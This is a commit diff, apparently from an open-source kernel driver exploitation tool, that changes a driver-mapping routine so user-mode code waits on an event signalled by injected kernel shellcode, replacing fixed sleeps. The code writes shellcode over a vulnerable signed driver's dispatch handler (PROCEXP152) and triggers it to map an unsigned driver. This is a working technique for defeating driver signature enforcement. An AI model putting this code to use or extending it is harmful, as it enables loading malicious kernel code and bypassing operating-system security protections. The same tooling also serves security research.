Replaced sleeps with an event

2021-02-10 22:03:41 +01:00 · 2021-02-10 22:03:41 +01:00 · f24852e8b3
parent def05c28db
commit f24852e8b3
2 changed files with 81 additions and 22 deletions
--- a/Source/Hamakaze/drvmap.cpp
+++ b/Source/Hamakaze/drvmap.cpp
@ -23,19 +23,20 @@
 // WARNING: shellcode DOESN'T WORK in DEBUG
 //

-#define BOOTSTRAPCODE_SIZE 1968 //correct this value if Import change it size
+#define BOOTSTRAPCODE_SIZE 1944 //correct this value if Import change it size

 //
 // Size in bytes
 // InitCode         16
-// Import           64
-// BootstrapCode    1968
+// Import           88
+// BootstrapCode    1944
 //

 //sizeof 2048
 typedef struct _SHELLCODE {
    BYTE InitCode[16];
    BYTE BootstrapCode[BOOTSTRAPCODE_SIZE];
+    HANDLE ReadyEventHandle;
    FUNC_TABLE Import;
 } SHELLCODE, * PSHELLCODE;

@ -219,6 +220,8 @@ NTSTATUS NTAPI FakeDispatchRoutine(

    USHORT                          cbValueKey = sizeof(szValueKey) - sizeof(WCHAR);

+    PKEVENT                         ReadyEvent;
+
    UNREFERENCED_PARAMETER(DeviceObject);

 #ifdef _DEBUG
@ -321,6 +324,17 @@ NTSTATUS NTAPI FakeDispatchRoutine(
                                ShellCode->Import.ZwClose(hThread);
                            }

+                            //
+                            // Fire the event to let userland know that we're ready
+                            //
+                            status = ShellCode->Import.ObReferenceObjectByHandle(ShellCode->ReadyEventHandle,
+                                SYNCHRONIZE | EVENT_MODIFY_STATE, NULL, 0, (PVOID*)&ReadyEvent, NULL);
+                            if (NT_SUCCESS(status))
+                            {
+                                ShellCode->Import.KeSetEvent(ReadyEvent, 0, FALSE);
+                                ShellCode->Import.ObfDereferenceObject(ReadyEvent);
+                            }
+
                            DeviceObject->SectorSize = 512;
                        }
                    }
@ -569,6 +583,18 @@ BOOL KDUSetupShellCode(
            (pfnZwDeleteValueKey)KDUResolveFunctionInternal(KernelBase, KernelImage, "ZwDeleteValueKey");
        ASSERT_RESOLVED_FUNC(g_ShellCode->Import.ZwDeleteValueKey);

+        g_ShellCode->Import.ObReferenceObjectByHandle =
+            (pfnObReferenceObjectByHandle)KDUResolveFunctionInternal(KernelBase, KernelImage, "ObReferenceObjectByHandle");
+        ASSERT_RESOLVED_FUNC(g_ShellCode->Import.ObReferenceObjectByHandle);
+
+        g_ShellCode->Import.ObfDereferenceObject =
+            (pfnObfDereferenceObject)KDUResolveFunctionInternal(KernelBase, KernelImage, "ObfDereferenceObject");
+        ASSERT_RESOLVED_FUNC(g_ShellCode->Import.ObfDereferenceObject);
+
+        g_ShellCode->Import.KeSetEvent =
+            (pfnKeSetEvent)KDUResolveFunctionInternal(KernelBase, KernelImage, "KeSetEvent");
+        ASSERT_RESOLVED_FUNC(g_ShellCode->Import.KeSetEvent);
+
        /*g_ShellCode->Import.DbgPrint =
            (pfnDbgPrint)KDUResolveFunctionInternal(KernelBase, KernelImage, "DbgPrint");
        ASSERT_RESOLVED_FUNC(g_ShellCode->Import.DbgPrint);*/
@ -800,27 +826,41 @@ Reload:

        if (KDUSetupShellCode(Context, lpMapDriverFileName)) {

-            //
-            // Write shellcode to driver.
-            //
-            if (!prov->Callbacks.WriteKernelVM(Context->DeviceHandle,
-                targetAddress,
-                g_ShellCode, sizeof(SHELLCODE)))
-            {
-                printf_s("[!] Error writing shellcode to the target driver, abort\r\n");
+            HANDLE readyEventHandle = CreateEventW(NULL, TRUE, FALSE, NULL);
+            if (readyEventHandle) {
+
+                g_ShellCode->ReadyEventHandle = readyEventHandle;
+
+                //
+                // Write shellcode to driver.
+                //
+                if (!prov->Callbacks.WriteKernelVM(Context->DeviceHandle,
+                    targetAddress,
+                    g_ShellCode, sizeof(SHELLCODE)))
+                {
+                    printf_s("[!] Error writing shellcode to the target driver, abort\r\n");
+                }
+                else {
+
+                    printf_s("[+] Driver IRP_MJ_DEVICE_CONTROL handler code modified\r\n");
+
+                    //
+                    // Run shellcode.
+                    // Target has the same handlers for IRP_MJ_CREATE/CLOSE/DEVICE_CONTROL
+                    //
+                    printf_s("[+] Run shellcode\r\n");
+                    supOpenDriver((LPWSTR)PROCEXP152, GENERIC_READ | GENERIC_WRITE, &victimDeviceHandle);
+
+                    //
+                    // Wait for the shellcode to trigger the event
+                    //
+                    if (WaitForSingleObject(readyEventHandle, 2000) != WAIT_OBJECT_0) {
+                        printf_s("[!] Shellcode did not trigger the event within two seconds.\r\n");
+                    }
+                }
            }
            else {
-
-                printf_s("[+] Driver IRP_MJ_DEVICE_CONTROL handler code modified\r\n");
-
-                //
-                // Run shellcode.
-                // Target has the same handlers for IRP_MJ_CREATE/CLOSE/DEVICE_CONTROL
-                //
-                printf_s("[+] Run shellcode\r\n");
-                Sleep(1000);
-                supOpenDriver((LPWSTR)PROCEXP152, GENERIC_READ| GENERIC_WRITE, &victimDeviceHandle);
-                Sleep(1000);
+                printf_s("[!] Error building the ready event handle, abort\r\n");
            }
        }
        else {
--- a/Source/Hamakaze/drvmap.h
+++ b/Source/Hamakaze/drvmap.h
@ -62,6 +62,22 @@ typedef VOID(NTAPI* pfnIofCompleteRequest)(
    _In_ VOID* Irp,
    _In_ CCHAR PriorityBoost);

+typedef NTSTATUS(NTAPI* pfnObReferenceObjectByHandle)(
+    _In_ HANDLE Handle,
+    _In_ ACCESS_MASK DesiredAccess,
+    _In_opt_ POBJECT_TYPE ObjectType,
+    _In_ KPROCESSOR_MODE AccessMode,
+    _Out_ PVOID* Object,
+    _Out_opt_ PVOID HandleInformation);
+
+typedef VOID(NTAPI* pfnObfDereferenceObject)(
+    _In_ PVOID Object);
+
+typedef NTSTATUS(NTAPI* pfnKeSetEvent)(
+    _In_ PKEVENT Event,
+    _In_ KPRIORITY Increment,
+    _In_ _Literal_ BOOLEAN Wait);
+
 typedef struct _FUNC_TABLE {
    pfnExAllocatePool ExAllocatePool;
    pfnExFreePool ExFreePool;
@ -71,6 +87,9 @@ typedef struct _FUNC_TABLE {
    pfnZwOpenKey ZwOpenKey;
    pfnZwQueryValueKey ZwQueryValueKey;
    pfnZwDeleteValueKey ZwDeleteValueKey;
+    pfnObReferenceObjectByHandle ObReferenceObjectByHandle;
+    pfnObfDereferenceObject ObfDereferenceObject;
+    pfnKeSetEvent KeSetEvent;
   // pfnDbgPrint DbgPrint;
 } FUNC_TABLE, * PFUNC_TABLE;